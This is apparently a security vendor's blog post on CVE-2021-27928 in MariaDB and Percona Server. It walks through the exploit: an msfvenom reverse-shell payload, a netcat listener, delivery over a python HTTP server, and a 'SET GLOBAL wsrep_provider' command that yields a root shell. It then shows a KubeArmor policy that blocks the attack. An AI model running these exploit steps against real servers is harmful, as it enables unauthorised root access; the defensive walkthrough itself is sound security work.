Protecting Percona DB Server from CVE-2021-27928 - Accuknox


See an insider threat where a malicious user can exploit remote code execution in Percona PMM Server, learn re the vulnerability and walk thru the exploit.


Data is a critical asset of any company, and data protection is a critical component of business protection. Having a strong database security posture will enable you to protect your organization’s sensitive information from outsiders.

Every database has different threats, so we will see an insider threat where a malicious user can exploit remote code execution in Percona PMM Server. We will first learn about the vulnerability and walk through the exploit itself to see how we can protect it against.

Vulnerability Assessment

So, let us understand the vulnerability. Remote code execution is the core issue here. An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd. To run this exploit, you can install any of the following versions below.


  1. MariaDB 10.2 before 10.2.37,

Or 10.3 before 10.3.28,

Or 10.4 before 10.4.18,

Or 10.5 before 10.5.9

2. Percona Server through 2021-03-03

The specific version has already been installed in our test-machine, as you can see below. root@kali will be our victim machine.

root@kali:~# mysql -V mysql Ver 15.1 Distrib 10.5.8-MariaDB, for debian-linux-gnu (x86_64) using EditLine wrapper

Percona server

The Exploit?

We will connect to another machine and then will start with the exploitation. host@h will be the attacker’s machine.

Step 1:

Let's create our reverse shell payload with msfvenom. For our payload we will use /Linux/x64/shell_reverse_tcp.

[NOTE] Change LHOST to your IP address.

host@h:~# msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=8181 -f elf-so -o


Step 2:

Now we will use Netcat to listen to the specified port.

host@h:~# nc -lvp -8181 listening on [any] 8181 ..


Step 3:

We will copy the payload to the victim machine. Here we will be using the python HTTP server.

host@h:~# python3 -m http.server 8000 Serving HTTP on port 8000 (

python HTTP server

Step 4:

Now let us get into the victim machine and download the payload. To do that just follow the commands below.

Command Command

Step 5:

We will now execute the payload.

root@kali:~# mysql -u root -p -h -e 'SET GLOBAL wsrep_provider="/tmp/";' Enter password: ERROR 2013 (HY000) at line


Now let us check our listener we successfully obtained root shell access.

Root shell Root shell


Let us see how we can protect it using the KubeArmor security policy.

How to use KubeArmor on your VM

Below is a sample policy we are going to apply using KubeArmor. We also have sample policies for various different workloads, curated by Security Experts. Check out the following link to view our other Policy Templates.

Kubearmor policy Kubearmor policy

We will save the file as vm-cve-2021-27928.yaml. To apply a VM policy just copy and paste the following command in your terminal.

karmor vm policy add vm-cve-2021-27928.yaml

 VM policy

root@kali:~ # karmor vm policy add vm-cve-2021-27928.yaml Success

 VM policy

Once the policy is applied let us execute the payload and see what happens.

Root shellRoot shell

It won’t open the dependencies used by wresp_provider and we won’t get the root shell access in the attacker machine and terminate the payload execution.

To check for logs just copy-paste the following command in your terminal.

karmor log --json




In this blog, we have seen how single unwanted permission in a variable from your DB’s codebase could be abused to gain root access to your system. There are several other exploits too that can be used against when you're running an outdated version of any database. Hence the solution is to always keep your DB versions updated to the latest patch as soon as it’s released by the vendors.

KubeArmor is a cloud run-time security tool by AccuKnox that makes the job of detecting such vulnerabilities and patching them up easier when the manual updates take time. To learn more about AccuKnox and its products, check out the links below.

KubeArmor website:

KubeArmor GitHub:

KubeArmor Slack:

Now you can protect your workloads in minutes using AccuKnox, it is available to protect your Kubernetes and other cloud workloads using Kernel Native Primitives such as AppArmor, SELinux, and eBPF.

Let us know if you are seeking additional guidance in planning your cloud security program.

Read more blogs from Cloud Security Category here.